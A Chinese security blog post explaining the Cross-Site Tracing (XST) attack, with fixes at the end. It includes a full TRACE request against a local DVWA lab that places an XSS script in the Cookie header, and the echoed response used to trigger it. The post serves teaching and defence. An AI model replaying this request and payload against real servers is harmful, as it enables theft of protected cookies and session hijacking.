首页 > 其他分享 >冷门攻击手法之跨站式追踪攻击

冷门攻击手法之跨站式追踪攻击

时间:2023-11-12 22:33:05浏览次数:27  
标签:请求 TRACE 攻击 XST 冷门 Cookie Accept 追踪

漏洞简介

XST 的全称是 Cross-Site Tracing,中文译作“跨站式追踪攻击”。具体而言,是客户端发 TRACE / TRACK 请求至服务器,如果服务器按照标准实现了 TRACE / TRACK 响应,则在 response body 里会返回此次请求的完整头信息。通过这种方式,客户端可以获取某些敏感的 header 字段,例如 httpOnly 的 Cookie 等。

攻击条件

1、需要目标 Web 服务器允许接受 Trace、Track 方法的请求;
2、客户端可以发送 Trace、Track 方法的请求。

攻击方法

1、首先通过抓包工具拦截请求,修改请求包中的请求方法和请求包中的任意一个字段,下面以Cookie字段为例,在Cookie中插入XSS代码:

TRACE /DVWA/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: <script>alert("TRACE XSS")</script>
Upgrade-Insecure-Requests: 1

2、修改响应包中的Content-Type:message/http,改为Content-Type:text/html:

HTTP/1.1 200 OK
Date: Sun, 12 Nov 2023 13:28:02 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
Content-Type: text/html
Content-Length: 401

TRACE /DVWA/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: <script>alert("TRACE XSS")</script>
Upgrade-Insecure-Requests: 1

发送请求后页面就会弹窗​,如下图:

修复方式

杜绝 XST 非常简单,Web 服务器限制 Trace、Track 方法的请求即可。另如今, XMLHTTPRequest 已经杜绝了 Trace 与 Track 方法的请求(Chrome 25 版本及 FireFox 19 之后),如果尝试用 Trace / Track 方法请求,会抛出 SecurityError 异常,这也从根本上杜绝了 XST 攻击。
同时,在 FireFox 43 之后,Cookie 等不安全字段也被禁止携带在请求的 header 中发送
虽说目前现代浏览器已经越来越安全,XST 也成为了历史,但其给我们 web 开发者也留下警示——代码编写时一定要注意安全性和严谨性。

优势

XST和XSS的​相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
XST的优点:可以绕过一般的http验证以及NTLM验证。

标签:请求,TRACE,攻击,XST,冷门,Cookie,Accept,追踪
From: https://www.cnblogs.com/spmonkey/p/17592785.html

相关文章

  • 【pwn】[HGAME 2023 week1]simple_shellcode --orw利用攻击
    先查看程序的保护状态可以看到,保护全开,拖进ida看主函数的逻辑可以看到有个mmap函数:mmap()函数是Unix和类Unix操作系统中的一个系统调用,用于在进程的地址空间中映射文件或者其它对象。这样做的好处是可以让文件直接映射到内存中,从而避免了频繁的文件I/O操作,提高了文件的读......
  • 13.xff注入攻击
    原理代码审计 黑盒测试下的xff注入攻击 在报文头部插入X-Forwardcd-for:127.0.0.1'and1=1#插入X-Forwardcd-for:127.0.0.1'and1=2# 两次结果不一样,存在注入点确认注入点这里有四个注入点进行联合查询X-Forwardcd-for:-127.0.0.1'unionselect1,2,us......
  • iOS移动应用安全加固:保护您的App免受恶意攻击的重要步骤
    ​目录iOS移动应用安全加固:保护您的App免受恶意攻击的重要步骤摘要引言一、APP加固的概念二、APP加固方案的比较三、保护iOS应用的安全四、总结参考资料 摘要本文介绍了移动应用程序(App)加固的概念和流程,以及市场上几家知名的APP加固公司。同时提供了对iOSipa文件进......
  • ​ iOS移动应用安全加固:保护您的App免受恶意攻击的重要步
    骤目录iOS移动应用安全加固:保护您的App免受恶意攻击的重要步骤摘要引言一、APP加固的概念二、APP加固方案的比较三、保护iOS应用的安全四、总结参考资料 摘要本文介绍了移动应用程序(App)加固的概念和流程,以及市场上几家知名的APP加固公司。同时提供了对iOSipa文件进......
  • Java JNI(Java Native Interface)攻击原理研究
    一、JavaJNI简介0x1:JNI是什么JNI(JavaNativeInterface,Java本地接口)是一种编程框架,使得Java虚拟机中的Java程序可以调用本地应用/或库,也可以被其他程序调用。本地程序一般是用其它语言(C、C++或汇编语言等)编写的,并且被编译为基于本机硬件和操作系统的程序。0x2:为什么需要JNI......
  • 硝烟后的茶歇 | 中睿天下谈攻防演练之邮件攻击溯源实战分享
    近日,由中国信息协会信息安全专业委员会、深圳市CIO协会、PCSA安全能力者联盟主办的《硝烟后的茶歇·广东站》主题故事会在深圳成功召开。活动已连续举办四年四期,共性智慧逐步形成《年度红蓝攻防系列全景图》、《三化六防“挂图作战”》等共性研究重要成果。此次会议邀请到了政府、......
  • House of apple 一种新的glibc中IO攻击方法 (2)
    目录Houseofapple一种新的glibc中IO攻击方法(2)前言利用条件利用原理利用思路利用_IO_wfile_overflow函数控制程序执行流利用_IO_wfile_underflow_mmap函数控制程序执行流利用_IO_wdefault_xsgetn函数控制程序执行流例题分析总结Houseofapple一种新的glibc中IO攻击方法(2......
  • 防止DOS攻击(检测nignx日志若某个IP短时间的PV过大则使用防火墙将其禁掉)
    #!/bin/bashtime=`date|awk'{print$3"\\\\/"$2"\\\\/"$6}'`awk'$4~/'"${time}"'/{print$0}'access.log|awk'{ip[$1]++}END{for(iinip)printi,ip[i]}'|sort-rnk2|head>18.t......
  • 客户案例:CAC2.0监测异常账号行为,缓解暴力破解攻击
    客户背景某IT互联网公司专注于高精度导航定位技术的研发、制造和产业化推广,是国内高精度导航定位产业的领先企业之一。该公司以上海为总部,旗下拥有20+国内省级本地化服务机构,并且其业务覆盖海外市场,公司产品和解决方案在不同领域和行业均取得显著的成就。问题需求通过与该公司管理......
  • 什么是网络攻击?常见的网络攻击手段有哪些?
    网络安全是指保护计算机系统和网络免受未经授权的访问、使用、泄露、破坏或干扰的一系列措施。而网络攻击是网络安全领域中的一个重要问题,其不仅危害多、影响大,且手段丰富,那么常见的网络攻击手段有哪些?具体请看下文。什么是网络攻击?网络攻击是指针对计算机信息系统、......